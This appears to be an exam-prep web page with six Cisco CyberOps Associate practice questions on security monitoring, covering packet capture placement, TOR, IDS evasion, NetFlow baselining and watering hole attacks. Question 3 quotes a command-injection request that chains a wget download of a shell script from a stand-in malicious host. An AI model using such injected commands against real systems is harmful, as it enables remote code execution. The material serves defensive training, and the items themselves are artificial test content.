Free Cisco Certified CyberOps Associate practice — 6 questions on Security Monitoring, with explanations. No sign-up.
Full 12-question mixed test →
Question 1 of 6 · Security Monitoring
A company's public web tier sits behind a load balancer that distributes each client's traffic across five backend servers, each with its own independent packet-capture sensor. An analyst investigating a suspicious session finds that no single sensor's PCAP contains the complete conversation — packets are split unpredictably across all five captures. Which change would best restore the analyst's ability to see a complete, correlated session for this and future incidents?
Load balancing splits a single client session across multiple backend paths, destroying visibility if capture happens after distribution. Capturing upstream of the load balancer, before the traffic-splitting decision, preserves the complete session in one place. This is a classic exam scenario about how load balancing degrades monitoring visibility and how to compensate.
Question 2 of 6 · Security Monitoring
An internal host is observed connecting outbound to a known TOR entry node IP address. The SOC cannot decrypt or inspect the TOR-layered payload. Which statement correctly describes the visibility impact of TOR in this scenario?
TOR's onion routing encrypts payload content across multiple relay layers, but the outer connection metadata (who is talking to a TOR entry node, when, and how much) is still observable at the network boundary. CBROPS emphasizes that encryption technologies like TOR reduce content visibility but flow/metadata-based detection (e.g., matching known TOR node IP lists) still works.
Question 3 of 6 · Security Monitoring
A web application access log shows the following request: GET /ping?ip=8.8.8.8;wget http://malicious.example.com/shell.sh HTTP/1.1. Which attack type is being attempted, and which data type is required to capture the exact injected payload for signature-based detection?
The semicolon is being used to chain an OS shell command (wget) onto a parameter intended only to hold an IP address — this is a classic command injection where the application passes user input unsanitized to a system shell. Detecting the exact injected string for signature matching requires full packet capture, since only that data type preserves the complete raw payload content.
Question 4 of 6 · Security Monitoring
An attacker crafts a TCP stream containing overlapping segments with conflicting sequence numbers and manipulated TTL values, such that the IDS sensor and the target host reassemble the overlapping data differently — the IDS interprets one version of the payload while the host executes another. This is an example of which evasion category?
This is a textbook insertion/evasion attack against network-based IDS: by exploiting differences in how the IDS and the end host handle overlapping fragments/segments (different TTL-based path assumptions or reassembly policies), the attacker causes the two systems to see different final payloads, allowing malicious content to slip past the sensor undetected.
Question 5 of 6 · Security Monitoring
Due to storage limitations, a SOC cannot retain full packet capture or per-request transaction logs for all internal hosts long-term. They instead want to detect slow, low-and-slow data exfiltration by comparing each host's outbound byte-count and connection-duration baselines over weeks. Which data type is best suited to this requirement?
Statistical data (e.g., flow-based summaries like NetFlow: byte counts, packet counts, connection duration, and volume trends over time) is designed exactly for this use case — long-term behavioral baselining with a much smaller storage footprint than full content capture. It's the CBROPS-tested answer for volume-and-behavior-based anomaly detection at scale.
Question 6 of 6 · Security Monitoring
Attackers compromise a legitimate industry conference website known to be frequently visited by engineers at a specific target firm, and embed malicious JavaScript that only delivers an exploit payload to visitors whose source IP falls within the target firm's known corporate address range. Which social-engineering technique does this best describe?
A watering hole attack compromises a legitimate site that the target's population is known to frequent, then selectively serves malicious content to visitors matching the target profile (here, source IP range) rather than directly contacting the victims — exactly matching this scenario.
Ready for the real thing?
The full course has two full-length practice tests, video lessons for every exam domain, hands-on labs and detailed answer explanations.